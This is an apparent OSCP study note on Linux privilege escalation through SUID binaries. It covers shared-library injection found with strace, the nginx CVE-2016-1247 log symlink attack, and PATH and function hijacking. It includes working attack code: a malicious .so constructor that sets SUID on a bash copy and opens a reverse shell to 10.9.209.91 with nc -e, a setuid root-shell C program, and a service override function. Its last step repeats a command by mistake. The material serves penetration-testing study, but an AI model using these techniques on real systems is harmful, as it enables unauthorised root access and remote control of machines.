// notes/ PrivEsc — Linux
🐧

Suid

<figure<img src="/files/7rsthw7veufURip3tl6S" alt=""<figcaption</figcaption</figure

#linux privilege escalation#adot8
source · oscp.adot8.com · linux-privilege-escalation/suid

SUID

Overview

<figure><img src="/files/7rsthw7veufURip3tl6S" alt=""><figcaption></figcaption></figure>

{% hint style="info" %} 4 bits for READ, 2 bits for WRITE and 1 bit for EXECUTE. chmod 777 would be rwx across the board {% endhint %}

Files with SUID (Set User ID) permissions allows the file to ran with permissions of another specified user

<figure><img src="/files/o6USTsO7A5WyZcdzv7Ib" alt=""><figcaption></figcaption></figure>

Escalation via SUID

code
01find / -perm -u=s -type f 2>/dev/null

Note down any interesting binaries and run them to see what they do

The strace debugging tool can be used to monitor and trace/track what a binary does when its ran.

code
01strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"

{% hint style="info" %} We want to find output that says "No such file or directory". We can then overwrite the file path/file with something malicious that will give us a root shell. {% endhint %}

<figure><img src="/files/B6llNZiCeGcFKQErMTpR" alt=""><figcaption></figcaption></figure>

Check to see if the file path is writeable and create malicious .so file

c
01#include <stdio.h>
02#include <sys/types.h>
03
04static void inject() __attribute__((constructor));
05void inject() {
06 system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/nc 10.9.209.91 1337 -e '/tmp/bash -p'");
07}
code
01gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/libcalc.c

Then run the original binary file

Escalation via Binary Symlinks

{% embed url="https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html" %}

This has to do with a vulnerability Nginx and utilizing SUID to escalate to root.

Because of the way that the logs are being created by Nginx and how their permissions are set, we can leveraged this to go from a www-data user to root.

code
01linux-exploit-suggester.sh
02[+] [CVE-2016-1247] nginxed-root.sh

Manually find it with dpkg. Any version <= 1.6.2 is vulnerable

bash
$dpkg -l | grep nginx

Next find out if there is a SUID bit on /usr/bin/sudo

bash
$find / -type f -perm -04000 -ls 2>/dev/null

Now we can create a Symlink between one of the Nginx log files and a malicious file so when it runs it runs as root

{% hint style="info" %} We need a startup/restart of the Nginx server for the malicious file to run {% endhint %}

Run the nginxed-root.sh tool and wait for Nginx to restart

Escalation via Environmental Variables

Environmental variables are variables that are available system wide and are inherited spawned by all child processes and shells

Check what the environmental variables on the machine are

code
01env

Find a binary with the SUID bit

code
01find / -type f -perm -04000 -ls 2>/dev/null

Read the strings of binary files

code
01strings /usr/local/bin/suid-env

While digging through the files you may come across the program trying to run another binary just by its name without using the full path. It can only do this because of the /usr/local/bin environment variable set in the shell.

<figure><img src="/files/gdYzpuC0YoCPElJ2tf1n" alt=""><figcaption></figcaption></figure>

We can exploit this by changing the env binary path of service and replacing it with a malicious service binary file

Spawn root shell binary file as a one liner

bash
$echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0;}' > /tmp/service.c

Compile

bash
$gcc /tmp/service.c -o /tmp/service

Change the $PATH variable and call the orginal binary

code
01export PATH=/tmp:$PATH
02/usr/local/bin/suid-env

ALTERNATIVE

In the case that the binary is calling a full path a function with the name service can be made with that spawns a new shell

bash
$function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }

export the function ( the -f means refer to shell function)

bash
$export -f /usr/sbin/service

Run the original binary

bash
$export -f /usr/sbin/service